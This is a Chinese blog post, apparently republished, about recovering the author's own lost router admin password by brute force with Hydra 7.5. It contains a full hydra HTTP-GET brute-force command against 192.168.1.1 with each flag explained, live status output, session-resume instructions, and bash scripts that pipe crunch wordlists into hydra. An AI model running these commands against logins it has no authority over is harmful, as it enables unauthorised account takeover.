路由器密碼破解工具 Hydra 7.5


之前只在 Browser 中保存了路由管理密碼,無奈升級時管理的密碼丟失了,又不想重新設置,所以嘗試破解登錄密碼。

使用破解工具 Hydra 7.5。

# hydra -l username -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /

其中:

-l username 為嘗試破解的用戶名。

-x 6:10:1a. 表示枚舉的密碼由 數字、小寫字母和單字符'.'等等組成,長度為 6 - 10 位。

-t 8 表示分 8 個並行任務進行爆破嘗試。

192.168.1.1 為 Router 地址。

http-get 為破解方式(協議)

/ 為頁面地址(根)

 

進行中的破解:

#  ./tp       ### hydra -l username -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http:
//www.thc.org/thc-hydra) starting at 2013-12-21 14:18:45
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA]
8 tasks, 1 server, 1646272629 login tries (l:1/p:1646272629), ~205784078 tries per task
[DATA] attacking service http
-get on port 80
[STATUS] 1187.00 tries/min, 1187 tries in 00:01h, 1646271442 todo in 23115:18h, 8 active
[STATUS]
1195.67 tries/min, 3587 tries in 00:03h, 1646269042 todo in 22947:43h, 8 active
......
......

Hydra 可以保存破解任務狀態(session),如果破解中斷了,下次執行 hydra -R /path/to/hydra.restore 就可以繼續任務。

 

還可以結合 crunch,通過使用 crunch 枚舉密碼,結合文件字典或者管道的方式爆破。

比如:

#!/bin/bash
#file: try
echo trying $1
hydra -l username -p $1 -t 1 192.168.1.1 http-get /
#!/bin/bash
#file: run
crunch 6 10 0123456789.@$  | xargs ./try

不過這種方式不便於使用 Hydra 的會話恢復功能。

 

希望能破出來!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM